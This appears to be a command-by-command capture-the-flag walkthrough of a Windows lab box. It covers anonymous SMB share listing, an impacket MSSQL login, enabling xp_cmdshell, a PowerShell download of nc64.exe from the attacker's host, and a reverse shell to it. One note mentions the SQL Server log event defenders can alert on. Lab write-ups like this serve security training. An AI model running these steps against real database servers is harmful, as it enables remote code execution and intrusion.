sudo apt install nmap
nmap -sC -sV {TARGET_IP}
sudo apt install smbclient
smbclient -N -L \\\\{TARGET_IP}\\
  -N : no password (anonymous / null session)
  -L : list the services (shares) available on a server
smbclient -N \\\\{TARGET_IP}\\backups
apt search impacket
sudo apt install impacket-scripts python3-impacket
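impacket-mssqlclient.py ARCHETYPE/<user>@{TARGET_IP} -windows-auth
(the `user@` part of this line was replaced by the site's e-mail obfuscation filter; presumably it is the sql_svc account whose profile directory appears in the later commands)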
Find the IP address of the VPN interface using `ip addr`.
SQL> EXEC xp_cmdshell 'net user';
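xp_cmdshell is disabled by default; turning it on requires ALTER SETTINGS permission (sysadmin or serveradmin), and the sp_configure change is recorded in the SQL Server error log (message 15457), which gives defenders a reliable event to alert on.
EXEC sp_configure 'show advanced options', 1;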
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
SQL> xp_cmdshell "whoami"
cd Downloads
sudo python3 -m http.server 80
sudo nc -lvnp 443
SQL> xp_cmdshell "powershell -c pwd"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.139 443"